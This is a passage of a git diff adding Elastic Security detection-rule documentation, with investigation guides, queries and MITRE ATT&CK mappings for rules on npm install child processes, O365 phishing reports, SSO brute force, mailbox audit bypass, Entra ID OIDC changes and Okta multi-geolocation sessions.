Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=10s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "node" and process.args == "install"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node"] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc new file mode 100644 index 0000000000..db2ed8dd82 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish]] +=== O365 Email Reported by User as Malware or Phish + +Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating O365 Email Reported by User as Malware or Phish* + + +Microsoft 365's email services are integral to business communication, but they can be exploited by adversaries through phishing or malware-laden emails. Attackers may bypass security measures, reaching users who might unwittingly engage with malicious content. The detection rule leverages user reports of suspicious emails, correlating them with security events to identify potential threats, thus enhancing the organization's ability to respond to phishing attempts and malware distribution. + + +*Possible investigation steps* + + +- Review the details of the alert triggered by the rule "Email reported by user as malware or phish" in the SecurityComplianceCenter to understand the context and specifics of the reported email. +- Examine the event dataset from o365.audit to gather additional information about the email, such as sender, recipient, subject line, and any attachments or links included. +- Correlate the reported email with other security events or alerts to identify any patterns or related incidents that might indicate a broader phishing campaign or malware distribution attempt. +- Check the user's report against known phishing or malware indicators, such as suspicious domains or IP addresses, using threat intelligence sources to assess the credibility of the threat. +- Investigate the user's activity following the receipt of the email to determine if any actions were taken that could have compromised the system, such as clicking on links or downloading attachments. +- Assess the effectiveness of current security controls and awareness training by analyzing how the email bypassed existing defenses and was reported by the user. + + +*False positive analysis* + + +- User-reported emails from trusted internal senders can trigger false positives. Encourage users to verify the sender's identity before reporting and consider adding these senders to an allowlist if they are consistently flagged. +- Automated system notifications or newsletters may be mistakenly reported as phishing. Educate users on recognizing legitimate automated communications and exclude these sources from triggering alerts. +- Emails containing marketing or promotional content from known vendors might be reported as suspicious. Train users to differentiate between legitimate marketing emails and phishing attempts, and create exceptions for verified vendors. 
+- Frequent reports of emails from specific domains that are known to be safe can lead to unnecessary alerts. Implement domain-based exceptions for these trusted domains to reduce false positives. +- Encourage users to provide detailed reasons for reporting an email as suspicious, which can help in refining detection rules and reducing false positives over time. + + +*Response and remediation* + + +- Isolate the affected email account to prevent further interaction with potentially malicious content and to stop any ongoing unauthorized access. +- Quarantine the reported email and any similar emails identified in the system to prevent other users from accessing them. +- Conduct a thorough scan of the affected user's device and network for any signs of malware or unauthorized access, using endpoint detection and response tools. +- Reset the credentials of the affected user account and any other accounts that may have been compromised to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident, providing details of the threat and actions taken, to ensure coordinated response efforts. +- Review and update email filtering and security policies to address any identified gaps that allowed the malicious email to bypass existing controls. +- Monitor for any further suspicious activity related to the incident, using enhanced logging and alerting mechanisms to detect similar threats in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:"Email reported by user as malware or phish" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc new file mode 100644 index 0000000000..2caf288469 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors]] +=== O365 Excessive Single Sign-On Logon Errors + +Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. 
+ +*Rule type*: threshold + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 211 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating O365 Excessive Single Sign-On Logon Errors* + + +Single Sign-On (SSO) in O365 streamlines user access by allowing one set of credentials for multiple applications. However, adversaries may exploit this by attempting brute force attacks to gain unauthorized access. The detection rule monitors for frequent SSO logon errors, signaling potential abuse, and helps identify compromised accounts by flagging unusual authentication patterns. + + +*Possible investigation steps* + + +- Review the specific account(s) associated with the excessive SSO logon errors by examining the event logs filtered by the query fields, particularly focusing on the o365.audit.LogonError field with the value "SsoArtifactInvalidOrExpired". +- Analyze the timestamps of the logon errors to determine if there is a pattern or specific time frame when the errors are occurring, which might indicate a targeted attack. +- Check for any recent changes or unusual activities in the affected account(s), such as password changes, unusual login locations, or device changes, to assess if the account might be compromised. +- Investigate the source IP addresses associated with the logon errors to identify if they are from known malicious sources or unusual locations for the user. +- Correlate the logon error events with other security alerts or logs from the same time period to identify any related suspicious activities or potential indicators of compromise. +- Contact the user(s) of the affected account(s) to verify if they experienced any issues with their account access or if they recognize the logon attempts, which can help determine if the activity is legitimate or malicious. + + +*False positive analysis* + + +- High volume of legitimate user logins: Users who frequently log in and out of multiple O365 applications may trigger excessive logon errors. To manage this, create exceptions for known high-activity accounts. +- Automated scripts or applications: Some automated processes may use outdated or incorrect credentials, leading to repeated logon errors. Identify and update these scripts to prevent false positives. +- Password changes: Users who recently changed their passwords might experience logon errors if they have not updated their credentials across all devices and applications. Encourage users to update their credentials promptly. +- Network issues: Temporary network disruptions can cause authentication errors. Monitor network stability and consider excluding errors during known network maintenance periods. 
+- Multi-factor authentication (MFA) misconfigurations: Incorrect MFA settings can lead to logon errors. Verify and correct MFA configurations for affected users to reduce false positives. + + +*Response and remediation* + + +- Immediately isolate the affected account by disabling it to prevent further unauthorized access attempts. +- Conduct a password reset for the compromised account and enforce a strong password policy to mitigate the risk of future brute force attacks. +- Review and analyze the account's recent activity logs to identify any unauthorized access or data exfiltration attempts. +- Implement multi-factor authentication (MFA) for the affected account and other high-risk accounts to add an additional layer of security. +- Notify the user of the affected account about the incident and provide guidance on recognizing phishing attempts and securing their credentials. +- Escalate the incident to the security operations team for further investigation and to determine if additional accounts or systems have been compromised. +- Update and enhance monitoring rules to detect similar patterns of excessive SSO logon errors, ensuring early detection of potential brute force attempts. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:"SsoArtifactInvalidOrExpired" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc new file mode 100644 index 0000000000..87d9fe908e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass]] +=== O365 Mailbox Audit Logging Bypass + +Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/misconfig/status/1476144066807140355 + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Initial Access +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating O365 Mailbox Audit Logging Bypass* + + +In Microsoft 365 environments, mailbox audit logging is crucial for tracking user activities like accessing or deleting emails. However, administrators can exempt certain accounts from logging to reduce noise, which attackers might exploit to hide their actions. The detection rule identifies successful attempts to create such exemptions, signaling potential misuse of this bypass mechanism. + + +*Possible investigation steps* + + +- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the presence of the Set-MailboxAuditBypassAssociation action. +- Identify the account associated with the event.action Set-MailboxAuditBypassAssociation and verify if it is a known and authorized account for creating audit bypass associations. +- Check the event.outcome field to ensure the action was successful and determine if there are any other related unsuccessful attempts that might indicate trial and error by an attacker. +- Investigate the history of the account involved in the bypass association to identify any unusual or suspicious activities, such as recent changes in permissions or unexpected login locations. +- Cross-reference the account with any known third-party tools or lawful monitoring accounts to determine if the bypass is legitimate or potentially malicious. +- Assess the risk and impact of the bypass by evaluating the types of activities that would no longer be logged for the account in question, considering the organization's security policies and compliance requirements. + + +*False positive analysis* + + +- Authorized third-party tools may generate a high volume of mailbox audit log entries, leading to bypass associations being set. Review and document these tools to ensure they are legitimate and necessary for business operations. +- Accounts used for lawful monitoring might be exempted from logging to reduce noise. Verify that these accounts are properly documented and that their activities align with organizational policies. +- Regularly review the list of accounts with bypass associations to ensure that only necessary and approved accounts are included. Remove any accounts that no longer require exemptions. +- Implement a process for periodically auditing bypass associations to detect any unauthorized changes or additions, ensuring that only intended accounts are exempted from logging. 
+- Consider setting up alerts for any new bypass associations to quickly identify and investigate potential misuse or unauthorized changes. + + +*Response and remediation* + + +- Immediately isolate the account associated with the successful Set-MailboxAuditBypassAssociation event to prevent further unauthorized actions. +- Review and revoke any unauthorized mailbox audit bypass associations to ensure all relevant activities are logged. +- Conduct a thorough audit of recent activities performed by the affected account to identify any suspicious or malicious actions that may have been concealed. +- Reset credentials for the compromised account and any other accounts that may have been affected to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement additional monitoring for similar bypass attempts to enhance detection capabilities and prevent recurrence. +- Consider escalating the incident to a higher security tier or external cybersecurity experts if the scope of the breach is extensive or if internal resources are insufficient to handle the threat. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc new file mode 100644 index 0000000000..cf0ba74a22 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id]] +=== OIDC Discovery URL Changed in Entra ID + +Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating OIDC Discovery URL Changed in Entra ID* + + +This rule detects when the OIDC `discoveryUrl` is changed within the Entra ID Authentication Methods policy. Adversaries may leverage this to federate Entra ID with a rogue Identity Provider (IdP) under their control, allowing them to authenticate users with attacker-owned credentials and bypass MFA. This misconfiguration allows an attacker to impersonate valid users by issuing tokens via a third-party OIDC IdP while still passing validation in Entra ID. This technique has been publicly demonstrated and has critical implications for trust in federated identity. + + +*Possible investigation steps* + +- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` and `ipAddress` to identify who made the change and from where. +- Examine the `old_oidc_discovery` and `new_oidc_discovery` to confirm if the new `discoveryUrl` points to an unexpected or untrusted IdP. +- Check that the discovery URLs have `.well-known/openid-configuration` endpoints, which are standard for OIDC providers. +- Use `azure.auditlogs.properties.correlation_id` to pivot to related changes and activity from the same session. +- Review any subsequent sign-in activity that may have originated from the new IdP. +- Pivot to additional logs associated with the user or application that made the change to identify any further suspicious activity. + + +*False positive analysis* + +- Entra ID administrators may intentionally reconfigure OIDC trust relationships to support new business requirements. +- Validate any changes with the identity or security operations team before taking action. + + +*Response and remediation* + +- If the change is unauthorized, immediately revert the discovery URL to the trusted IdP via the Entra ID portal. +- Revoke tokens or sessions issued after the configuration change. +- Investigate how the unauthorized change occurred (e.g., compromised account or over-privileged app). +- Apply conditional access policies and change control procedures to protect IdP configuration changes. 
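+
+To review recent Authentication Methods Policy updates as part of the investigation steps above, a scoped ES|QL search such as the following can help. It is a sketch that reuses field names from the rule query below; the 30-day window is an assumption.
+
+[source, js]
+----------------------------------
+// Sketch only: list recent policy updates with initiator details.
+from logs-azure.auditlogs-*
+| where
+    event.action == "Authentication Methods Policy Update" and
+    @timestamp > now() - 30 days
+| keep
+    @timestamp,
+    event.outcome,
+    azure.auditlogs.properties.initiated_by.user.userPrincipalName,
+    azure.auditlogs.properties.initiated_by.user.ipAddress,
+    azure.correlation_id
+| sort @timestamp desc
+
+----------------------------------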
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.auditlogs-* metadata _id, _version, _index +| where event.action == "Authentication Methods Policy Update" +| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.new_value`, "\\\\", "") +| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.old_value`, "\\\\", "") +| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace "%{}discoveryUrl\":\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new}\"}%{}" +| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace "%{}discoveryUrl\":\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old}\"}%{}" +| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new is not null and Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old is not null +| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new != Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old +| keep + @timestamp, + event.action, + event.outcome, + azure.tenant_id, + azure.correlation_id, + azure.auditlogs.properties.activity_datetime, + azure.auditlogs.properties.operation_type, + azure.auditlogs.properties.initiated_by.user.userPrincipalName, + azure.auditlogs.properties.initiated_by.user.displayName, + azure.auditlogs.properties.initiated_by.user.ipAddress, + source.geo.city_name, + source.geo.region_name, + source.geo.country_name, + Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new, + Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Sub-technique: +** Name: Conditional Access Policies +** ID: T1556.009 +** Reference URL: https://attack.mitre.org/techniques/T1556/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc new file mode 100644 index 0000000000..2e4473ee6b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations]] +=== Okta User Sessions Started from Different Geolocations + +Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://developer.okta.com/docs/reference/api/system-log/ +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 308 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Okta User Sessions Started from Different Geolocations* + + +This rule detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.id` values can be used to pivot into the raw authentication events related to this alert. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. + - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. + + +*False positive analysis:* + +- It is very rare that a legitimate user would have multiple sessions started from different geo-located countries in a short time frame. + + +*Response and remediation:* + +- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required. 
+- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA).
+  - If MFA is already enabled, consider resetting MFA for the users.
+- If any of the users are not legitimate, consider deactivating the user's account.
+- Conduct a review of Okta policies and ensure they are in accordance with security best practices.
+- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.
+  - If so, confirm with the user this was a legitimate request.
+  - If so and this was not a legitimate request, consider deactivating the user's account temporarily.
+    - Reset passwords and reset MFA for the user.
+- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.
+  - This will prevent future occurrences of this event for this device from triggering the rule.
+  - Alternatively, adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.
+    - This should be done with caution as it may prevent legitimate alerts from being generated.
+
+
+==== Setup
+
+
+The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+from logs-okta*
+| where
+  event.dataset == "okta.system" and
+  (event.action like "user.authentication.*" or event.action == "user.session.start") and
+  okta.security_context.is_proxy != true and
+  okta.actor.id != "unknown" and
+  event.outcome == "success"
+| keep
+  event.action,
+  okta.security_context.is_proxy,
+  okta.actor.id,
+  okta.actor.alternate_id,
+  event.outcome,
+  client.geo.country_name
+| stats
+  Esql.client_geo_country_name_count_distinct = count_distinct(client.geo.country_name)
+  by okta.actor.id, okta.actor.alternate_id
+| where
+  Esql.client_geo_country_name_count_distinct >= 2
+| sort
+  Esql.client_geo_country_name_count_distinct desc
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Valid Accounts
+** ID: T1078
+** Reference URL: https://attack.mitre.org/techniques/T1078/
+* Sub-technique:
+** Name: Cloud Accounts
+** ID: T1078.004
+** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc new file mode 100644 index 0000000000..f3980a0c52 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-onedrive-malware-file-upload]] +=== OneDrive Malware File Upload
+
+Identifies the occurrence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries the opportunity to gain initial access to other endpoints in the environment.
